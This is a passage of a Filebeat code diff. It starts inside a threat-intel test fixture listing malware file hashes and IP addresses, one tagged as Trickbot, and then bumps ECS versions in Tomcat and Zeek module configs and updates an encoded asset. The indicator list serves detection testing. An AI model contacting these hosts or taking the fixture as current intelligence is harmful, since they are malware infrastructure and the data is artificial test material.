"threatintel.otx.title": "Win64:Malware-gen" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 12092, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha1": "e5dc7c8bfa285b61dda1618f0ade9c256be75d1a", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + "threatintel.otx.title": "Win64:Malware-gen" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 12248, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.ip": "96.9.77.142", + "threatintel.indicator.type": "ipv4-addr", + "threatintel.otx.content": "", + "threatintel.otx.title": "Trickbot" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 12357, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.ip": "36.89.106.69", + "threatintel.indicator.type": "ipv4-addr", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 12461, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.ip": "96.9.73.73", + "threatintel.indicator.type": "ipv4-addr", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 12563, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.md5": "10ec3571596c30b9993b89f12d29d23c", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + "threatintel.otx.description": "MD5 of 9af8a93519d22ed04ffb9ccf6861c9df1b77dc5d22e0aeaff4a582dbf8660ba6", + "threatintel.otx.title": "xor_0x20_xord_javascript" + } +] \ No newline at end of file diff --git a/x-pack/filebeat/module/tomcat/log/config/input.yml b/x-pack/filebeat/module/tomcat/log/config/input.yml index 7cf2dd7ce0af..d8c776349f34 100644 --- a/x-pack/filebeat/module/tomcat/log/config/input.yml +++ b/x-pack/filebeat/module/tomcat/log/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/_meta/config.yml b/x-pack/filebeat/module/zeek/_meta/config.yml index 3be38969bb48..cc4572f6874a 100644 --- a/x-pack/filebeat/module/zeek/_meta/config.yml +++ b/x-pack/filebeat/module/zeek/_meta/config.yml @@ -20,7 +20,7 @@ http: enabled: true intel: - enabled: true + enabled: true irc: enabled: true kerberos: @@ -43,6 +43,8 @@ enabled: true rfb: enabled: true + signature: + enabled: true sip: enabled: true smb_cmd: diff --git a/x-pack/filebeat/module/zeek/capture_loss/config/capture_loss.yml b/x-pack/filebeat/module/zeek/capture_loss/config/capture_loss.yml index 73d374965aa6..66a028f309d7 100644 --- a/x-pack/filebeat/module/zeek/capture_loss/config/capture_loss.yml +++ b/x-pack/filebeat/module/zeek/capture_loss/config/capture_loss.yml @@ -22,4 +22,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/connection/config/connection.yml b/x-pack/filebeat/module/zeek/connection/config/connection.yml index 179f20a9043b..71169efdf28f 100644 --- a/x-pack/filebeat/module/zeek/connection/config/connection.yml +++ b/x-pack/filebeat/module/zeek/connection/config/connection.yml @@ -102,4 +102,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/dce_rpc/config/dce_rpc.yml b/x-pack/filebeat/module/zeek/dce_rpc/config/dce_rpc.yml index f86600e146de..b14165562eae 100644 --- a/x-pack/filebeat/module/zeek/dce_rpc/config/dce_rpc.yml +++ b/x-pack/filebeat/module/zeek/dce_rpc/config/dce_rpc.yml @@ -58,4 +58,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/dhcp/config/dhcp.yml b/x-pack/filebeat/module/zeek/dhcp/config/dhcp.yml index 9e659922486d..b59227d30df2 100644 --- a/x-pack/filebeat/module/zeek/dhcp/config/dhcp.yml +++ b/x-pack/filebeat/module/zeek/dhcp/config/dhcp.yml @@ -120,4 +120,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/dnp3/config/dnp3.yml b/x-pack/filebeat/module/zeek/dnp3/config/dnp3.yml index 89a389c597e2..6cd83108b416 100644 --- a/x-pack/filebeat/module/zeek/dnp3/config/dnp3.yml +++ b/x-pack/filebeat/module/zeek/dnp3/config/dnp3.yml @@ -68,4 +68,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/dns/config/dns.yml b/x-pack/filebeat/module/zeek/dns/config/dns.yml index 9381f616b899..731304610340 100644 --- a/x-pack/filebeat/module/zeek/dns/config/dns.yml +++ b/x-pack/filebeat/module/zeek/dns/config/dns.yml @@ -210,4 +210,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/dpd/config/dpd.yml b/x-pack/filebeat/module/zeek/dpd/config/dpd.yml index 6d14aa2cd4d5..b7a9c30ec107 100644 --- a/x-pack/filebeat/module/zeek/dpd/config/dpd.yml +++ b/x-pack/filebeat/module/zeek/dpd/config/dpd.yml @@ -57,4 +57,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/fields.go b/x-pack/filebeat/module/zeek/fields.go index 8154c14a5429..d048c716bf66 100644 --- a/x-pack/filebeat/module/zeek/fields.go +++ b/x-pack/filebeat/module/zeek/fields.go @@ -19,5 +19,5 @@ func init() { // AssetZeek returns asset data. // This is the base64 encoded gzipped contents of module/zeek. func AssetZeek() string { - return "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